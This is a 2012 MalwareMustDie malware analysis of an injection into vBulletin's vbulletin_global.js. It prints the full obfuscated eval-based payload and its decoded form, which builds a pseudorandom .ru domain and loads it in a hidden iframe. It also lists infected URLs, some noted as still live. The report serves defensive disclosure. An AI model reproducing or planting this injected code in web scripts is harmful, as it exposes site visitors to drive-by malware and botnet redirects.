===================================================================================== #MalwareMustDie Mon Oct 8 04:19:36 JST 2012 Infections of Psudorandom is aiming vBulletin script/patches.. specially patches were not well-attended installed, easy target for infector code - injection ===================================================================================== -------------------------------------------------------------------------------------- Fact/Background: -------------------------------------------------------------------------------------- 0. vBulletin Forum often installed w/the well-atended WebApps security & targetted for malware infections/ 1. i.e. vBulletin (Forum,CMS++) was releasing patch to 3.6.8 to fix a security issue reported within the WYSIWYG editor for Firefox↓ https://www.vbulletin.com/forum/showthread.php/247739-vBulletin-3-6-8-Patch-Level-2-Released 2. The patch itself named "vbulletin_global.js"was mentioned may not be redistributed in whole or significant part. And this patch was latest injected in some sites. -------------------------------------------------------------------------------------- Infections sighted in some sites, one example is as follows: -------------------------------------------------------------------------------------- Date: Mon Oct 8 04:03:30 JST 2012 --04:03:38-- http://24rs.org/forums/clientscript/vbulletin_global.js => `vbulletin_global.js' Resolving 24rs.org... 24.106.10.35 Connecting to 24rs.org|24.106.10.35|:80... connected. HTTP request sent, awaiting response... 200 OK Length: 51,352 (50K) [application/x-javascript] 04:03:40 (56.66 KB/s) - `vbulletin_global.js' saved [51352/51352] -------------------------------------------------------------------------------------- Injected with the malicious code at line 1951 (last line of orig script) as per below: //*km0ae9gr6m*/try{prototype%2;}catch(asd){x=2;}try{q=document[(x)?"c"+"r":2+"e"+"a"+"t"+"e"+"E"+"l"+"e"+"m"+((f)?"e"+"n"+"t":"")]("p");q.appendChild(q+"");}catch(fwbewe){i=0;try{prototype*5;}catch(z){fr="fromChar";f=[510,702,550,594,580,630,555,660,160,660,505,720,580,492,485,660,500,666,545,468,585,654,490,606,570,240,205,738,50,192,160,192,160,708,485,684,160,624,525,192,305,192,580,624,525,690,230,690,505,606,500,192,235,192,580,624,525,690,230,486,295,60,160,192,160,192,590,582,570,192,540,666,160,366,160,696,520,630,575,276,575,606,505,600,160,222,160,696,520,630,575,276,405,354,50,192,160,192,160,708,485,684,160,696,505,690,580,192,305,192,580,624,525,690,230,390,160,252,160,648,555,192,225,192,580,624,525,690,230,492,160,252,160,624,525,354,50,192,160,192,160,630,510,240,580,606,575,696,160,372,160,288,205,738,50,192,160,192,160,192,160,192,160,696,520,630,575,276,575,606,505,600,160,366,160,696,505,690,580,354,50,192,160,192,160,750,160,606,540,690,505,192,615,60,160,192,160,192,160,192,160,192,580,624,525,690,230,690,505,606,500,192,305,192,580,606,575,696,160,258,160,696,520,630,575,276,385,354,50,192,160,192,160,750,50,192,160,192,160,684,505,696,585,684,550,192,200,696,520,630,575,276,575,606,505,600,160,252,160,696,520,630,575,276,555,660,505,474,590,606,570,462,205,354,50,750,50,60,510,702,550,594,580,630,555,660,160,492,485,660,500,666,545,468,585,654,490,606,570,426,505,660,505,684,485,696,555,684,200,702,550,630,600,246,615,60,160,192,160,192,590,582,570,192,500,192,305,192,550,606,595,192,340,582,580,606,200,702,550,630,600,252,245,288,240,288,205,354,50,192,160,192,160,708,485,684,160,690,160,366,160,600,230,618,505,696,360,666,585,684,575,240,205,192,310,192,245,300,160,378,160,294,160,348,160,288,295,60,160,192,160,192,580,624,525,690,230,690,505,606,500,192,305,192,250,306,260,318,270,330,280,342,240,294,160,258,160,240,500,276,515,606,580,462,555,660,580,624,200,246,160,252,160,288,600,420,350,420,350,420,350,246,160,258,160,240,500,276,515,606,580,408,485,696,505,240,205,192,210,192,240,720,350,420,350,420,205,258,160,240,385,582,580,624,230,684,555,702,550,600,200,690,160,252,160,288,600,420,350,420,205,246,295,60,160,192,160,192,580,624,525,690,230,390,160,366,160,312,280,300,275,294,295,60,160,192,160,192,580,624,525,690,230,462,160,366,160,300,245,312,275,312,280,306,270,312,275,354,50,192,160,192,160,696,520,630,575,276,405,192,305,192,580,624,525,690,230,462,160,282,160,696,520,630,575,276,325,354,50,192,160,192,160,696,520,630,575,276,410,192,305,192,580,624,525,690,230,462,160,222,160,696,520,630,575,276,325,354,50,192,160,192,160,696,520,630,575,276,555,660,505,474,590,606,570,462,160,366,160,294,230,288,160,282,160,696,520,630,575,276,385,354,50,192,160,192,160,696,520,630,575,276,550,606,600,696,160,366,160,660,505,720,580,492,485,660,500,666,545,468,585,654,490,606,570,354,50,192,160,192,160,684,505,696,585,684,550,192,580,624,525,690,295,60,625,60,50,612,585,660,495,696,525,666,550,192,495,684,505,582,580,606,410,582,550,600,555,654,390,702,545,588,505,684,200,684,220,192,385,630,550,264,160,462,485,720,205,738,50,192,160,192,160,684,505,696,585,684,550,192,385,582,580,624,230,684,555,702,550,600,200,240,385,582,600,270,385,630,550,246,160,252,160,684,230,660,505,720,580,240,205,192,215,192,385,630,550,246,295,60,625,60,50,612,585,660,495,696,525,666,550,192,515,606,550,606,570,582,580,606,400,690,505,702,500,666,410,582,550,600,555,654,415,696,570,630,550,618,200,702,550,630,600,264,160,648,505,660,515,696,520,264,160,732,555,660,505,246,615,60,160,192,160,192,590,582,570,192,570,582,550,600,160,366,160,660,505,714,160,492,485,660,500,666,545,468,585,654,490,606,570,426,505,660,505,684,485,696,555,684,200,702,550,630,600,246,295,60,160,192,160,192,590,582,570,192,540,606,580,696,505,684,575,192,305,192,455,234,485,234,220,234,490,234,220,234,495,234,220,234,500,234,220,234,505,234,220,234,510,234,220,234,515,234,220,234,520,234,220,234,525,234,220,234,530,234,220,234,535,234,220,234,540,234,220,234,545,234,220,234,550,234,220,234,555,234,220,234,560,234,220,234,565,234,220,234,570,234,220,234,575,234,220,234,580,234,220,234,585,234,220,234,590,234,220,234,595,234,220,234,600,234,220,234,605,234,220,234,610,234,465,354,50,192,160,192,160,708,485,684,160,690,580,684,160,366,160,234,195,354,50,192,160,192,160,612,555,684,200,708,485,684,160,630,160,366,160,288,295,192,525,192,300,192,540,606,550,618,580,624,295,192,525,192,215,258,160,246,615,60,160,192,160,192,160,192,160,192,575,696,570,192,215,366,160,648,505,696,580,606,570,690,455,594,570,606,485,696,505,492,485,660,500,666,545,468,585,654,490,606,570,240,570,582,550,600,220,192,240,264,160,648,505,696,580,606,570,690,230,648,505,660,515,696,520,192,225,192,245,246,465,354,50,192,160,192,160,750,50,192,160,192,160,684,505,696,585,684,550,192,575,696,570,192,215,192,195,276,195,192,215,192,610,666,550,606,295,60,625,60,50,690,505,696,420,630,545,606,555,702,580,240,510,702,550,594,580,630,555,660,200,246,615,60,160,192,160,192,580,684,605,738,50,192,160,192,160,192,160,192,160,630,510,240,580,726,560,606,555,612,160,630,510,684,485,654,505,522,485,690,335,684,505,582,580,606,500,192,305,366,160,204,585,660,500,606,510,630,550,606,500,204,205,738,50,192,160,192,160,192,160,192,160,192,160,192,160,630,510,684,485,654,505,522,485,690,335,684,505,582,580,606,500,192,305,192,580,684,585,606,295,60,160,192,160,192,160,192,160,192,160,192,160,192,590,582,570,192,585,660,525,720,160,366,160,462,485,696,520,276,570,666,585,660,500,240,215,660,505,714,160,408,485,696,505,240,205,282,245,288,240,288,205,354,50,192,160,192,160,192,160,192,160,192,160,192,160,708,485,684,160,600,555,654,485,630,550,468,485,654,505,192,305,192,515,606,550,606,570,582,580,606,400,690,505,702,500,666,410,582,550,600,555,654,415,696,570,630,550,618,200,702,550,630,600,264,160,294,270,264,160,234,570,702,195,246,295,60,160,192,160,192,160,192,160,192,160,192,160,192,525,612,570,654,160,366,160,600,555,594,585,654,505,660,580,276,495,684,505,582,580,606,345,648,505,654,505,660,580,240,170,438,350,492,325,462,345,204,205,354,160,60,160,192,160,192,160,192,160,192,160,192,160,192,525,612,570,654,230,690,505,696,325,696,580,684,525,588,585,696,505,240,170,690,570,594,170,264,160,204,520,696,580,672,290,282,235,204,215,600,555,654,485,630,550,468,485,654,505,258,170,282,570,702,550,612,555,684,505,690,580,684,585,660,315,690,525,600,305,588,555,696,550,606,580,300,170,246,295,192,50,192,160,192,160,192,160,192,160,192,160,192,160,630,510,684,545,276,575,696,605,648,505,276,595,630,500,696,520,192,305,192,170,288,560,720,170,354,160,60,160,192,160,192,160,192,160,192,160,192,160,192,525,612,570,654,230,690,580,726,540,606,230,624,505,630,515,624,580,192,305,192,170,288,560,720,170,354,160,60,160,192,160,192,160,192,160,192,160,192,160,192,525,612,570,654,230,690,580,726,540,606,230,708,525,690,525,588,525,648,525,696,605,192,305,192,170,624,525,600,500,606,550,204,295,192,50,192,160,192,160,192,160,192,160,192,160,192,160,600,555,594,585,654,505,660,580,276,490,666,500,726,230,582,560,672,505,660,500,402,520,630,540,600,200,630,510,684,545,246,295,60,160,192,160,192,160,192,160,192,625,60,160,192,160,192,625,594,485,696,495,624,200,606,205,738,625,60,625,264,160,318,240,288,205,354];v="eva";}if(v)e=window[v+"l"];w=f;s=[];r=String;z=((e)?"Code":"");for(;1776-5+5>i;i+=1){j=i;if(e)s=s+r[fr+((e)?"Code":12)]((w[j]/(5+e("j%2"))));} if(f)e(s);} /*qhk6sa6g1c*/ -------------------------------------------------------------------------------------- if you crack this correctly this is the currently back to epidemic the JS/runforestrun Pseudorandom as per example cracked in MalwareMustDie.blogspot.com last post. PoC: -------------------------------------------------------------------------------------- function nextRandomNumber(){ var hi = this.seed / this.Q; var lo = this.seed % this.Q; var test = this.A * lo - this.R * hi; if(test > 0){ this.seed = test; } else { this.seed = test + this.M; } return (this.seed * this.oneOverM); } function RandomNumberGenerator(unix){ var d = new Date(unix*1000); var s = d.getHours() > 12 ? 1 : 0; this.seed = 2345678901 + (d.getMonth() * 0xFFFFFF) + (d.getDate() * 0xFFFF)+ (Math.round(s * 0xFFF)); this.A = 48271; this.M = 2147483647; this.Q = this.M / this.A; this.R = this.M % this.A; this.oneOverM = 1.0 / this.M; this.next = nextRandomNumber; return this; } function createRandomNumber(r, Min, Max){ return Math.round((Max-Min) * r.next() + Min); } function generatePseudoRandomString(unix, length, zone){ var rand = new RandomNumberGenerator(unix); var letters = ['a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z']; var str = ''; for(var i = 0; i < length; i ++ ){ str += letters[createRandomNumber(rand, 0, letters.length - 1)]; } return str + '.' + zone; } setTimeout(function(){ try{ if(typeof iframeWasCreated == "undefined"){ iframeWasCreated = true; var unix = Math.round(+new Date()/1000); var domainName = generatePseudoRandomString(unix, 16, 'ru'); ifrm = document.createElement("IFRAME"); ifrm.setAttribute("src", "http://"+domainName+"/runforestrun?sid=botnet2"); ifrm.style.width = "0px"; ifrm.style.height = "0px"; ifrm.style.visibility = "hidden"; document.body.appendChild(ifrm); } }catch(e){} }, 500); -------------------------------------------------------------------------------------- vBulletin attcked sites in history less than 2 weeks: -------------------------------------------------------------------------------------- http://25fev.vuzforum.ru/--ms-forum/clientscript/vbulletin_md5.js?v=385 [Still Alive] http://www.pribaltica.info/clientscript/vbulletin_thrdpostlist.js?v=380 [Still Alive] http://pribaltica.info/clientscript/vbulletin_thrdpostlist.js?v=380 [Closed/hanled] http://b-static.net/vbulletin/images/custom/beta2/buttons [Closed/hanled] http://www.boards.ie/vbulletin/showthread.php?p=80832999#post80832999 [Closed/hanled] -------------------------------------------------------------------------------------- #MalwareMustDie!